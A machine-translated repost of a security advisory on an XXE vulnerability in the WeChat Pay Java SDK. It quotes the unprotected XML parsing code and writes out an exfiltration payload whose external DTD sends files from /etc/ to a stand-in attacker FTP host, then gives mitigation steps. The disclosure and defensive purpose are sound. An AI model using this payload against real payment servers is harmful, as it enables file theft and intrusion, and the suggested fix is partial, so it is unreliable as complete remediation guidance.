Yesterday, there was a signature white hat called Rose Jackcode published a micro-channel pay sdk serious security vulnerabilities (xxe vulnerability) in foreign security community seclists. An attacker could craft a malicious callback request data (xml format), to read any file on the merchant's server, even for remote command system, leading to the merchant server to be invaded.
Currently micro-channel payment security team, said the SDK has been updated, fixing known security vulnerabilities, and to remind businesses to date.
Although the official micro-channel pay online sdk updated, but the vulnerability is present in the merchant's site systems, businesses need to download the latest system update sdk release (see below or own rehabilitation program). So there are still a large number of micro-channel business system of this vulnerability, related businesses need to be updated.
Take a look at the micro-channel pay sdk how vulnerabilities caused by:
What is xxe vulnerability, xxe called the XML External Entity attack, namely XML External Entity vulnerability. XML external entity definition content can be loaded locally or remotely.
Affected versions: WxPayAPI_JAVA_v3.zip (previous versions should also be affected)
Vulnerabilities in README.md sdk version presented examples:
String notifyData = "....";
MyConfig config = new MyConfig();
WXPay wxpay = new WXPay(config); //conver to map
Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
....
WXPayUtil in:
public static Map<String, String> xmlToMap(String strXML) throws Exception {
Map<String, String> data = new HashMap<String, String>();
DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
// 没有xxe防范
DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
InputStream stream = new ByteArrayInputStream(strXML.getBytes( "UTF-8")); org.w3c.dom.Document doc = documentBuilder.parse(stream);
...
}
How to simulate exploit this vulnerability:
The merchant callback url in simulation post the following xml data:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [ <!ENTITY % attack SYSTEM "file:///etc/">
<!ENTITY % hxt SYSTEM "http://attack:8080/shell/data.dtd";>
%hxt;
]>
http: // attack: 8080 for the attacker to build their own server, write in data.dtd in:
<!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack; '>">
%shell;
%upload;
After triggering XXE attacks, merchant server will / etc / content is sent to the attacker's ftp: // attack: 33.
Do not have the latest version of the sdk rehabilitation program:
plan 1.
Disable external entities in the WXPayUtil
DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
Plus the following
documentBuilderFactory.setExpandEntityReferences(false);
Scenario 2.
Filtering XML data submitted by users
Key words:!! <DOCTYPE and <ENTITY, or, SYSTEM and PUBLIC.
Reproduced in: https: //my.oschina.net/passerman/blog/1840218